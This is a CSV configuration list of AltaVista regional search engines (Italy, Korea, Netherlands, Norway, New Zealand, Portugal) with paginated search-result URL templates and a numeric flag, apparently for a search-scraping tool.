"International","AltaVista IT 3 (Next 50)","http://it.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","AltaVista IT 3 (Next 50)","http://it.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","AltaVista IT 3 (Next 50)","http://it.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","AltaVista IT 3 (Next 50)","http://it.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","AltaVista IT 3 (Next 50)","http://it.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","AltaVista IT 4 (Next 50)","http://it.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","1"
"International","AltaVista IT 4 (Next 50)","http://it.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","AltaVista IT 4 (Next 50)","http://it.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","AltaVista IT 4 (Next 50)","http://it.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","AltaVista IT 4 (Next 50)","http://it.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","AltaVista IT 4 (Next 50)","http://it.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","AltaVista IT 5 (Next 50)","http://it.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","1"
"International","AltaVista IT 5 (Next 50)","http://it.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","AltaVista IT 5 (Next 50)","http://it.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","AltaVista IT 5 (Next 50)","http://it.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","AltaVista IT 5 (Next 50)","http://it.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","AltaVista IT 5 (Next 50)","http://it.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista KR","http://kr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","Altavista KR","http://kr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista KR","http://kr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista KR","http://kr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista KR","http://kr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista KR","http://kr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista KR 2 (Next 50)","http://kr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","Altavista KR 2 (Next 50)","http://kr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista KR 2 (Next 50)","http://kr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista KR 2 (Next 50)","http://kr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista KR 2 (Next 50)","http://kr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista KR 2 (Next 50)","http://kr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista KR 3 (Next 50)","http://kr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","1"
"International","Altavista KR 3 (Next 50)","http://kr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista KR 3 (Next 50)","http://kr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista KR 3 (Next 50)","http://kr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista KR 3 (Next 50)","http://kr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista KR 3 (Next 50)","http://kr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista KR 4 (Next 50)","http://kr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","1"
"International","Altavista KR 4 (Next 50)","http://kr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista KR 4 (Next 50)","http://kr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista KR 4 (Next 50)","http://kr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista KR 4 (Next 50)","http://kr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista KR 4 (Next 50)","http://kr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista KR 5 (Next 50)","http://kr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","1"
"International","Altavista KR 5 (Next 50)","http://kr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista KR 5 (Next 50)","http://kr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista KR 5 (Next 50)","http://kr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista KR 5 (Next 50)","http://kr.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista KR 5 (Next 50)","http://kr.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","1"
"International","AltaVista NL","http://nl.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","AltaVista NL","http://nl.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","AltaVista NL","http://nl.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","AltaVista NL","http://nl.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","AltaVista NL","http://nl.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","AltaVista NL","http://nl.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","AltaVista NL 2 (Next 50)","http://nl.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","AltaVista NL 2 (Next 50)","http://nl.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","AltaVista NL 2 (Next 50)","http://nl.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","AltaVista NL 2 (Next 50)","http://nl.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","AltaVista NL 2 (Next 50)","http://nl.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","AltaVista NL 2 (Next 50)","http://nl.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","AltaVista NL 3 (Next 50)","http://nl.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","1"
"International","AltaVista NL 3 (Next 50)","http://nl.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","AltaVista NL 3 (Next 50)","http://nl.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","AltaVista NL 3 (Next 50)","http://nl.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","AltaVista NL 3 (Next 50)","http://nl.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","AltaVista NL 3 (Next 50)","http://nl.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","AltaVista NL 4 (Next 50)","http://nl.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","1"
"International","AltaVista NL 4 (Next 50)","http://nl.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","AltaVista NL 4 (Next 50)","http://nl.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","AltaVista NL 4 (Next 50)","http://nl.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","AltaVista NL 4 (Next 50)","http://nl.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","AltaVista NL 4 (Next 50)","http://nl.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","AltaVista NL 5 (Next 50)","http://nl.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","1"
"International","AltaVista NL 5 (Next 50)","http://nl.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","AltaVista NL 5 (Next 50)","http://nl.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","AltaVista NL 5 (Next 50)","http://nl.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","AltaVista NL 5 (Next 50)","http://nl.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","AltaVista NL 5 (Next 50)","http://nl.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista NO","http://no.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","Altavista NO","http://no.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista NO","http://no.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista NO","http://no.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista NO","http://no.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista NO","http://no.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista NO 2 (Next 50)","http://no.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","Altavista NO 2 (Next 50)","http://no.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista NO 2 (Next 50)","http://no.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista NO 2 (Next 50)","http://no.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista NO 2 (Next 50)","http://no.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista NO 2 (Next 50)","http://no.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista NO 3 (Next 50)","http://no.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","1"
"International","Altavista NO 3 (Next 50)","http://no.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista NO 3 (Next 50)","http://no.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista NO 3 (Next 50)","http://no.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista NO 3 (Next 50)","http://no.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista NO 3 (Next 50)","http://no.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista NO 4 (Next 50)","http://no.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","1"
"International","Altavista NO 4 (Next 50)","http://no.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista NO 4 (Next 50)","http://no.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista NO 4 (Next 50)","http://no.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista NO 4 (Next 50)","http://no.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista NO 4 (Next 50)","http://no.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista NO 5 (Next 50)","http://no.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","1"
"International","Altavista NO 5 (Next 50)","http://no.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista NO 5 (Next 50)","http://no.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista NO 5 (Next 50)","http://no.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista NO 5 (Next 50)","http://no.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista NO 5 (Next 50)","http://no.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista NZ","http://nz.altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=1&kls=1&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=0","1"
"International","Altavista NZ","http://nz.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista NZ","http://nz.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista NZ","http://nz.altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=1&kls=1&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=0","0"
"International","Altavista NZ","http://nz.altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=1&kls=1&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=0","0"
"International","Altavista NZ","http://nz.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista NZ 2 (Next 50)","http://nz.altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=1&kls=1&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=50","1"
"International","Altavista NZ 2 (Next 50)","http://nz.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista NZ 2 (Next 50)","http://nz.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista NZ 2 (Next 50)","http://nz.altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=1&kls=1&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=50","0"
"International","Altavista NZ 2 (Next 50)","http://nz.altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=1&kls=1&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=50","0"
"International","Altavista NZ 2 (Next 50)","http://nz.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista NZ 3 (Next 50)","http://nz.altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=1&kls=1&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=100","1"
"International","Altavista NZ 3 (Next 50)","http://nz.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista NZ 3 (Next 50)","http://nz.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista NZ 3 (Next 50)","http://nz.altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=1&kls=1&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=100","0"
"International","Altavista NZ 3 (Next 50)","http://nz.altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=1&kls=1&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=100","0"
"International","Altavista NZ 3 (Next 50)","http://nz.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista NZ 4 (Next 50)","http://nz.altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=1&kls=1&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=150","1"
"International","Altavista NZ 4 (Next 50)","http://nz.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista NZ 4 (Next 50)","http://nz.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista NZ 4 (Next 50)","http://nz.altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=1&kls=1&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=150","0"
"International","Altavista NZ 4 (Next 50)","http://nz.altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=1&kls=1&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=150","0"
"International","Altavista NZ 4 (Next 50)","http://nz.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista NZ 5 (Next 50)","http://nz.altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=1&kls=1&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=200","1"
"International","Altavista NZ 5 (Next 50)","http://nz.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista NZ 5 (Next 50)","http://nz.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista NZ 5 (Next 50)","http://nz.altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=1&kls=1&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=200","0"
"International","Altavista NZ 5 (Next 50)","http://nz.altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=1&kls=1&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=200","0"
"International","Altavista NZ 5 (Next 50)","http://nz.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista PT","http://pt.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","Altavista PT","http://pt.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista PT","http://pt.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista PT","http://pt.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista PT","http://pt.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista PT","http://pt.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista PT 2 (Next 50)","http://pt.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","Altavista PT 2 (Next 50)","http://pt.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista PT 2 (Next 50)","http://pt.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista PT 2 (Next 50)","http://pt.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista PT 2 (Next 50)","http://pt.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista PT 2 (Next 50)","http://pt.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista PT 3 (Next 50)","http://pt.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","1"
"International","Altavista PT 3 (Next 50)","http://pt.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista PT 3 (Next 50)","http://pt.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista PT 3 (Next 50)","http://pt.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista PT 3 (Next 50)","http://pt.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista PT 3 (Next 50)","http://pt.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista PT 4 (Next 50)","http://pt.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","1"
"International","Altavista PT 4 (Next 50)","http://pt.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista PT 4 (Next 50)","http://pt.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista PT 4 (Next 50)","http://pt.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista PT 4 (Next 50)","http://pt.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista PT 4 (Next 50)","http://pt.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista PT 5 (Next 50)","http://pt.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","1"
